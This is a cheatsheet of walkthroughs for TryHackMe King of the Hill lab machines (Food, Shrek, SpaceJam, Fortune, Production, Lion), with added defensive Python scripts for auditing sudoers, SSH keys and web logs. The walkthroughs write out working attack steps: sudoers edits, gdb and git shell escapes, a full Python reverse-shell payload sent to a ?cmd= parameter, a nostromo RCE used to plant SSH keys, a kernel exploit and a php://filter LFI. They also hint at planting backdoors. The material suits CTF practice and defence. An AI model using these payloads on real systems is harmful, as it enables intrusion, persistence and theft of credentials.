King-of-the-hill

Walkthroughs and cheatsheets for the King of the Hill machines on the online hacking platform TryHackMe.

MIT License

This is a work in progress; many more machine cheatsheets will be added soon.


Sorry, I am lazy AF, will update more machines soon!

I am not posting the methods that are 'technically' better; I am posting the methods that are easiest to do and will get you the win. The target is to win while staying inside the rules. This is not an exam, there are no wrong answers. As the saying goes: if it works, don't touch it.

This is a GitHub cheatsheet for owning the machines in the King of the Hill game on TryHackMe.

Index of Machines Covered:

  1. Food
  2. Shrek
  3. SpaceJam
  4. Fortune
  5. Production
  6. Lion
  7. Hackers

Machine name: FOOD

An nmap scan with -p- revealed a telnet service running on port 46969.

So following are the steps to get root, ASAP.

  1. Connect to the port:
    telnet <IP> 46969
  2. The username and password are given in a Caesar cipher; decoded, they are:
    Username: food
    Password: givemecookies
  3. After scanning the machine with linPEAS.sh, we found that the vim.basic binary can read and write privileged files, so we use it to edit the sudoers file:
    vim.basic /etc/sudoers
    Press i
    Add this line right after the line that starts with root:
    food ALL=(ALL:ALL) ALL
    Press Ctrl+[ (that is Esc)
    Type :w! and press Enter
    Type :q! and press Enter
    sudo su
    At the prompt enter the password of food, i.e. givemecookies
    YOU ARE ROOT. NOW DEFEND YOUR TITLE.

Machine name: SHREK

This is the first and a relatively easy machine, but beware: this box has too many entry points to keep an eye on, so the best idea for defending it is just killing the other players' shells. Again, I am posting the easiest methods, not the 'technically' better ones; the target is to win while staying inside the rules. This is not an exam, there are no wrong answers. As the saying goes: if it works, don't touch it.

  1. An initial gobuster scan revealed that robots.txt contains an abnormal entry; navigating to it, we find an entire RSA private key.

[screenshot: the RSA private key found via the robots.txt entry]

  2. Copy the key, paste it into a file and give the file the necessary permissions.
    Assuming you saved the RSA key in a file named id_rsa, run these commands:
    chmod 600 id_rsa
    ssh -i id_rsa shrek@<IP ADDRESS OF MACHINE>
    This will give you a shell as shrek.

  3. After scanning the machine with linPEAS.sh, we found that gdb on the box can be abused for privilege escalation; using the GTFOBins recipe, we run:
    gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit

YOU ARE ROOT. NOW DEFEND YOUR TITLE.

Machine name: SPACE JAM

This machine is a race to root: there is a very low-hanging fruit to get root, but it is a one-shot entry, i.e. whoever uses it first will try their best to destroy this entry, because it is wide open.

  1. As always, we start with a basic nmap scan.
    [screenshot: nmap scan output]

  2. We can see that port 3000 is hosting Node.js openly, so we try to get a reverse shell from it.
    To do that, first start a listener on your machine:
    ncat -lvnp 4444   # I am using ncat since I am on an Arch-based system; you can use nc in place of ncat.
    Once the listener is ready, we deploy the payload.

  3. After testing many payloads, we found the Python one to be working. For more payloads, follow this link.
    The payload:
    Replace <REMOTE_IP> with the IP of the box.
    Replace <LOCAL_IP> with the IP of your TryHackMe VPN interface.

     curl "<REMOTE_IP>:3000/?cmd=python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%22<LOCAL_IP>%22%2C4444%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B%20os.dup2%28s.fileno%28%29%2C1%29%3B%20os.dup2%28s.fileno%28%29%2C2%29%3Bp%3Dsubprocess.call%28%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D%29%3B%27"
    

    On the listener you can see that we now have a shell.

  4. After a lot of tests and linPEAS, I found that the easiest method to get king AND a root shell is to exploit the cp vulnerability on the box. I am leaving the ideas for that to you, but first let's make you king.

    LFILE=/root/king.txt
    echo "<YOUR USERNAME>" | cp /dev/stdin "$LFILE"

YOU ARE KING. NOW DEFEND YOUR TITLE.

Free tip: you can read any file with this vuln, use your imagination.
LFILE=file_to_read
cp "$LFILE" /dev/stdout

Machine name: FORTUNE

Now this is a new machine, released very recently, and it made it hard for me to post direct commands. Why?
Here's why: this machine has a thing called an autogen script that regenerates everything at every reset. That means hardcoded credentials don't work anymore, so you have to follow the instructions and do everything manually.
Let's hack:

  1. Initial nmap scans revealed a service listening on port 3333 that you talk to with netcat.
    [screenshot: nmap scan output]
UPDATE: you can skip the next two steps and directly use the command in the Shortcut Note.
  2. When we connect to it, it gives out a weird base64 blob. After fiddling around, I found that it is the base64 data of a zip file, so we use a base64-to-file site:
    Paste the base64 data into the site and it will generate a file named application.zip.

  3. Now when we try to open the file, it asks for a password. Just crack it using fcrackzip and the rockyou.txt wordlist:
    fcrackzip -v -u -D -p ~/wordlists/rockyou.txt application.zip
    Once you have the password, unzip it:
    unzip application.zip

Shortcut Note: MAKE SURE TO DO THE FOLLOWING EDITS:

$IP = IP of the KoTH box (the base64 data comes from the service on port 3333)
$location = directory that holds your rockyou.txt wordlist
Save the base64 data in a file (file.txt below), then:

base64 -d file.txt > test.zip; unzip -P "$(fcrackzip -v -u -D -p $location/rockyou.txt test.zip | grep "pw" | awk '{print $5}')" test.zip; cat creds.txt

You get a file named creds.txt; inside it are the login details of the user fortuna. Let's go.
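The Fortune service hands out a base64 blob that turns out to be a password-protected zip. As an added example (not from the original cheatsheet), the Python below decodes such a blob and walks the ZIP local file headers to report entry names, sizes and whether the encryption flag is set, without extracting or cracking anything, so you know what you are holding before you reach for fcrackzip. The two sample archives inside are constructed in memory; because Python's zipfile cannot write encrypted archives, the "flagged" sample merely has bit 0 of the flags field set, which is all this inspector looks at.

```python
import base64
import io
import struct
import zipfile

LOCAL_HEADER_SIG = b'PK\x03\x04'


def decode_blob(b64_text: str) -> bytes:
    """Strip whitespace (the blob arrives over netcat, usually line-wrapped) and decode."""
    return base64.b64decode(''.join(b64_text.split()), validate=True)


def parse_local_headers(data: bytes) -> list:
    """Walk the ZIP local file headers in order and describe each entry.
    Nothing is extracted; bit 0 of the general-purpose flags marks encryption."""
    entries = []
    off = 0
    while data[off:off + 4] == LOCAL_HEADER_SIG:
        (_version, flags, method, _mtime, _mdate, _crc, comp_size, uncomp_size,
         name_len, extra_len) = struct.unpack_from('<HHHHHIIIHH', data, off + 4)
        name = data[off + 30:off + 30 + name_len].decode('utf-8', 'replace')
        entries.append({'name': name, 'size': uncomp_size,
                        'compressed_size': comp_size, 'method': method,
                        'encrypted': bool(flags & 0x1)})
        if flags & 0x8:
            # Sizes live in a trailing data descriptor, so the next header
            # cannot be located from this one; stop rather than guess.
            break
        off += 30 + name_len + extra_len + comp_size
    return entries


def inspect_blob(b64_text: str) -> dict:
    """Decode the blob and, if it starts like a zip, list what is inside."""
    data = decode_blob(b64_text)
    if not data.startswith(LOCAL_HEADER_SIG):
        return {'is_zip': False, 'entries': []}
    return {'is_zip': True, 'entries': parse_local_headers(data)}


def make_sample_zip(flag_encrypted: bool) -> bytes:
    """Constructed sample archive shaped like the one Fortune hands out.
    Python's zipfile cannot write encrypted archives, so the 'encrypted'
    variant just sets flag bit 0 in the local header, which is all the
    inspector above looks at (the entry data stays in the clear)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w', zipfile.ZIP_STORED) as zf:
        zf.writestr('creds.txt', 'fortuna:<placeholder-password>\n')
    data = bytearray(buf.getvalue())
    if flag_encrypted:
        flags = struct.unpack_from('<H', data, 6)[0] | 0x1
        struct.pack_into('<H', data, 6, flags)
    return bytes(data)


SAMPLE_PLAIN_B64 = base64.b64encode(make_sample_zip(False)).decode()
SAMPLE_FLAGGED_B64 = base64.b64encode(make_sample_zip(True)).decode()
SAMPLE_NOT_ZIP_B64 = base64.b64encode(b'just some text, not an archive').decode()

if __name__ == '__main__':
    for label, blob in (('plain', SAMPLE_PLAIN_B64), ('flagged', SAMPLE_FLAGGED_B64),
                        ('text', SAMPLE_NOT_ZIP_B64)):
        print(label, inspect_blob(blob))
```

To use it on the real blob, save what the port 3333 service prints to a file and pass its contents to inspect_blob; the entry list tells you whether the archive actually holds a creds.txt and whether a password is needed at all.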
  4. Using the creds:
    ssh fortuna@<BOX IP>
  5. Now that we have the shell, we can work on privilege escalation. After linPEAS and basic tests, I found that:
    5.1 We, as fortuna, are in the sudoers list.
    5.2 We also have pico in the sudo -l output.

  6. We can simply edit the /etc/sudoers file to give ourselves ALL permissions with sudo.
  7. Using this command:
    sudo pico /etc/sudoers
    Replace pico in the fortuna entry with ALL.
  8. Now you can just run sudo su and you are root.

You are ROOT, now defend your title.

Machine name: PRODUCTION

This machine is one of the easiest ones.
[screenshot: nmap scan output]

  1. Basic enumeration will get you the password / SSH id_rsa key of the user Ashu.
  2. Once you are on the machine as Ashu:
    Check sudo -l; you will see that you can run su as the user skiddy without a password.
  3. After sudo su skiddy, you are in skiddy's shell.
  4. We don't need to enumerate this machine any further: sudo -l shows that we can run git as sudo.
  5. Using GTFObins, we see that the following commands give us a root shell:
    sudo git -p help config
    !/bin/sh
    Now run id. Voila, you are root.
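Food, Fortune and Production are all won through a sudoers entry (a new ALL rule, an editor such as pico or vim.basic, or git allowed under sudo), so once you are king that file is where the next player will show up. The audit script below is an added example, not the cheatsheet's own code: it parses sudoers-style text (a constructed sample modelled on the three boxes) and flags full-access rules for unexpected users, NOPASSWD entries, and commands whose binary is one this page shows escaping to a shell. It understands the plain one-line rule form only; aliases, backslash continuations and #include directives are assumed absent and are not handled.

```python
import os
import re

# Binaries this cheatsheet shows being turned into a root shell when allowed
# under sudo (vim.basic on Food, pico on Fortune, git on Production, gdb on Shrek).
SHELL_ESCAPE_BINARIES = {'vim', 'vim.basic', 'pico', 'git', 'gdb'}

# user_or_%group  hosts = (runas) [TAG:] cmd, [TAG:] cmd ...
RULE_RE = re.compile(
    r'^(?P<who>\S+)\s+(?P<hosts>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*(?P<cmds>.+)$')
TAG_RE = re.compile(r'^([A-Z_]+):\s*')


def parse_sudoers(text: str) -> list:
    """Turn sudoers text into rules. One-line form only: no aliases, no
    backslash continuations; lines starting with '#' (including #include and
    #includedir) are treated as comments and skipped."""
    rules = []
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].strip()
        if not line or line.startswith('Defaults'):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        cmds = []
        nopasswd = False  # a tag applies to its command and every later one until changed
        for cmd in m.group('cmds').split(','):
            cmd = cmd.strip()
            while (t := TAG_RE.match(cmd)):
                tag = t.group(1).upper()
                if tag == 'NOPASSWD':
                    nopasswd = True
                elif tag == 'PASSWD':
                    nopasswd = False
                cmd = cmd[t.end():]
            cmds.append((cmd, nopasswd))
        rules.append({'who': m.group('who'), 'hosts': m.group('hosts'),
                      'runas': m.group('runas') or 'root', 'cmds': cmds})
    return rules


def audit(rules: list, expected_full_access=('root', '%sudo')) -> list:
    """Return (who, command, reason) for every entry worth a second look."""
    findings = []
    for rule in rules:
        if rule['who'] in expected_full_access:
            continue
        for cmd, nopasswd in rule['cmds']:
            base = os.path.basename(cmd.split()[0]) if cmd else ''
            if cmd == 'ALL':
                findings.append((rule['who'], cmd, f"may run any command as {rule['runas']}"))
            elif base in SHELL_ESCAPE_BINARIES:
                findings.append((rule['who'], cmd, f"{base} can spawn a shell as {rule['runas']}"))
            if nopasswd:
                findings.append((rule['who'], cmd, 'NOPASSWD: no credential needed'))
    return findings


# Constructed sample, modelled on the end state of the boxes above.
SAMPLE_SUDOERS = """\
# constructed sample sudoers
Defaults env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
food    ALL=(ALL:ALL) ALL
fortuna ALL=(ALL) /usr/bin/pico
ashu    ALL=(root) NOPASSWD: /bin/su skiddy
skiddy  ALL=(ALL) /usr/bin/git
backup  ALL=(root) /usr/bin/rsync
"""

if __name__ == '__main__':
    for who, cmd, reason in audit(parse_sudoers(SAMPLE_SUDOERS)):
        print(f'{who:8s} {cmd:24s} {reason}')
```

Run it against the output of `sudo cat /etc/sudoers` (and each file under /etc/sudoers.d) on a box you hold; the expected_full_access tuple is where you list the accounts that legitimately have ALL, so everything else that appears is another player's persistence.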

P.S. Food for thought: there are two interesting ports open on the machine, see if you can set up backdoors for yourself ;)

You are ROOT, now defend your title.

Machine name: Lion

  1. After the nmap scan we can see that, weirdly, there is no SSH on the machine's default port, but nostromo is present on port 8080.
    Later, after doing a complete scan, we found that SSH has been moved to port 1337.
    [screenshot: nmap scan output]

  2. Searching for this nostromo version, we found it is vulnerable to CVE-2019-16278.

  3. Simply downloading the exploit from exploitdb, we get RCE on the machine. Note that the exploit script is Python 2 based.
    python2 cve2019-16278.py <KOTH MACHINE IP> 8080 "whoami"
    The output of whoami comes back, confirming command execution.

Online there are methods to use this CVE to get a reverse shell, but for some weird reason I was not able to get a reverse shell from it. So here's my workaround: first we generate an SSH key pair on our machine, then, since we have RCE, we write our public key into authorized_keys on the box.

  4. Generating the SSH key pair (this writes the private key to sshkey and the public key to sshkey.pub):
    ssh-keygen -f sshkey
  5. Getting the authorized_keys entry:
    We need the contents of the *.pub file for this. It looks like this:
    [screenshot: contents of the .pub file]
  6. Now use this command:
    python2 cve2019-16278.py <KOTH IP> 8080 "mkdir /home/gloria/.ssh; echo '<YOUR *.pub file data>' > /home/gloria/.ssh/authorized_keys"
  7. Now we can simply SSH into the machine with our key:
    ssh -i sshkey gloria@<KOTH BOX IP> -p 1337
  8. Since our key is in authorized_keys, we are logged in without a password.
  9. Since we have a shell, privilege escalation is the next step. After some LinPEAS and LinEnum, I found that this box's kernel is vulnerable to CVE-2017-16995.
  10. So we download the exploit from exploitdb. Here's a little trick to save compile time on the remote machine: instead of uploading and compiling the exploit there, we use --static in gcc to build a binary that is usable everywhere.
    gcc --static cve-2017-16995.c -o cve-2017-16995 && chmod +x cve-2017-16995
  11. Now just upload the binary to the remote box and run it to get root.
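The Lion workaround above is persistence by public key, which is exactly what you want to spot on a box you are defending. As an added example (not part of the original), here is a Python inventory of an authorized_keys file: it parses the optional options field, key type, base64 blob and comment, computes the same SHA256 fingerprint that ssh-keygen -l prints, checks that the type string embedded in the blob matches the declared type, and reports any key whose fingerprint is not on an allowlist. The two keys inside are constructed dummies in the ed25519 wire layout, not real keys, and the allowlist is assumed to come from wherever you keep your own fingerprints.

```python
import base64
import binascii
import hashlib
import re
import struct

# [options] key-type base64-blob [comment]
KEY_RE = re.compile(
    r'(?:^|\s)(?P<type>ssh-(?:rsa|ed25519|dss)|ecdsa-sha2-nistp(?:256|384|521)|'
    r'sk-ssh-ed25519@openssh\.com|sk-ecdsa-sha2-nistp256@openssh\.com)'
    r'\s+(?P<b64>[A-Za-z0-9+/=]+)(?:\s+(?P<comment>.*?))?\s*$')


def fingerprint(blob: bytes) -> str:
    """SHA256 fingerprint in the form `ssh-keygen -l` prints (base64, no padding)."""
    digest = hashlib.sha256(blob).digest()
    return 'SHA256:' + base64.b64encode(digest).decode().rstrip('=')


def parse_authorized_keys(text: str) -> list:
    """One dict per key line; malformed lines get an 'error' entry instead."""
    keys = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith('#'):
            continue
        m = KEY_RE.search(line)
        if not m:
            keys.append({'line': lineno, 'error': 'unparseable line'})
            continue
        try:
            blob = base64.b64decode(m.group('b64'), validate=True)
            (type_len,) = struct.unpack_from('>I', blob, 0)
            embedded_type = blob[4:4 + type_len].decode('ascii')
        except (binascii.Error, struct.error, UnicodeDecodeError):
            keys.append({'line': lineno, 'error': 'malformed key blob'})
            continue
        keys.append({
            'line': lineno,
            'options': line[:m.start()].strip(),
            'type': m.group('type'),
            'comment': m.group('comment') or '',
            'fingerprint': fingerprint(blob),
            'consistent': embedded_type == m.group('type'),
        })
    return keys


def unknown_keys(text: str, known_fingerprints: set) -> list:
    """Every entry that is malformed or whose fingerprint is not on the allowlist."""
    return [k for k in parse_authorized_keys(text)
            if 'error' in k or k['fingerprint'] not in known_fingerprints]


def make_dummy_ed25519_blob(fill: int) -> bytes:
    """Constructed stand-in for a public key: the real ssh-ed25519 wire layout
    (length-prefixed type string, length-prefixed 32-byte point) filled with a
    repeated byte. Not a usable key, just enough to parse and fingerprint."""
    key_type = b'ssh-ed25519'
    return (struct.pack('>I', len(key_type)) + key_type +
            struct.pack('>I', 32) + bytes([fill]) * 32)


ADMIN_B64 = base64.b64encode(make_dummy_ed25519_blob(1)).decode()
ROGUE_B64 = base64.b64encode(make_dummy_ed25519_blob(2)).decode()

# Constructed sample file: one key you put there, one you did not.
SAMPLE_AUTHORIZED_KEYS = f"""\
# constructed sample
from="10.10.0.5",no-pty ssh-ed25519 {ADMIN_B64} admin@ops
ssh-ed25519 {ROGUE_B64} player2@unknown-host
"""
KNOWN_FINGERPRINTS = {fingerprint(make_dummy_ed25519_blob(1))}

if __name__ == '__main__':
    for key in parse_authorized_keys(SAMPLE_AUTHORIZED_KEYS):
        print(key)
    print('not on allowlist:',
          [k.get('comment', k.get('error'))
           for k in unknown_keys(SAMPLE_AUTHORIZED_KEYS, KNOWN_FINGERPRINTS)])
```

The fingerprint is computed over the raw decoded blob, which is what ssh-keygen hashes, so values from this script can be compared directly against `ssh-keygen -lf yourkey.pub` output on your own machine.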

Now you are root. Defend your title.

P.S. If you are locked out and forgot to make a backdoor, here's food for thought: there's an LFI at this address.
http://lion.thm:5555/?page=php://filter/convert.base64-encode/resource=../../../../etc/passwd
where lion.thm resolves to the machine's IP via your hosts file ;) (Maybe you can get an id_rsa.)
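Both SpaceJam's ?cmd= entry and the Lion LFI leave an obvious trace in the web server's access log, which is the first place to look when you are defending a box and the king.txt changes under you. As an added example (not from the original cheatsheet), the Python below parses combined-format log lines, URL-decodes the query string (repeatedly, to catch double encoding) and flags php:// wrappers, ../ traversal and shell-looking content in parameter values. The log lines are constructed for the example, with a shortened cmd payload instead of the full reverse-shell one-liner. The indicator list is deliberately small and will produce false positives on innocent text, so treat hits as things to look at, not verdicts.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Combined/common log format: ip ident user [time] "METHOD path HTTP/x" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)')

# Small, intentionally noisy indicator set. Order matters: the first two are
# also checked against the request path, the third only against parameter values.
INDICATORS = [
    ('php-wrapper', re.compile(r'php://', re.I)),
    ('path-traversal', re.compile(r'\.\./|\.\.\\')),
    ('shell-in-param', re.compile(r'\b(?:sh|bash|python\d?|nc|ncat|perl)\b|[;|`]')),
]


def decode_fully(value: str, rounds: int = 3) -> str:
    """URL-decode until the text stops changing (bounded), so %252e style
    double encoding does not hide the payload from the regexes."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyse_request(target: str) -> list:
    """Return (indicator, where, excerpt) triples for one request target."""
    url = urlsplit(target)
    findings = []
    path = decode_fully(url.path)
    for name, rx in INDICATORS[:2]:
        if rx.search(path):
            findings.append((name, 'path', path[:80]))
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        value = decode_fully(value)  # parse_qsl already decoded one layer
        for name, rx in INDICATORS:
            if rx.search(value):
                findings.append((name, key, value[:80]))
    return findings


def scan_log(lines) -> list:
    """One alert per request that triggered at least one indicator."""
    alerts = []
    for raw in lines:
        m = LOG_RE.match(raw)
        if not m:
            continue
        findings = analyse_request(m.group('path'))
        if findings:
            alerts.append({'ip': m.group('ip'), 'status': m.group('status'),
                           'path': m.group('path'), 'findings': findings})
    return alerts


# Constructed sample log: a normal hit, a ?cmd= request like the SpaceJam
# entry (payload shortened), the Lion php://filter LFI, and a harmless search.
SAMPLE_LOG = """\
10.10.1.5 - - [12/Mar/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.10.1.7 - - [12/Mar/2021:10:02:15 +0000] "GET /?cmd=python%20-c%20%27import%20os%3Bos.system%28%22id%22%29%27 HTTP/1.1" 200 0 "-" "curl/7.74.0"
10.10.1.9 - - [12/Mar/2021:10:03:40 +0000] "GET /?page=php://filter/convert.base64-encode/resource=../../../../etc/passwd HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
10.10.1.5 - - [12/Mar/2021:10:04:01 +0000] "GET /search?q=shrek HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

if __name__ == '__main__':
    for alert in scan_log(SAMPLE_LOG.splitlines()):
        print(alert['ip'], alert['path'])
        for finding in alert['findings']:
            print('   ', *finding)
```

On a real box feed it the web server's access log (for nostromo on Lion or the Node.js app on SpaceJam, wherever that service writes its log); the source IP of each alert is the other player, and the parameter name tells you which entry they are using.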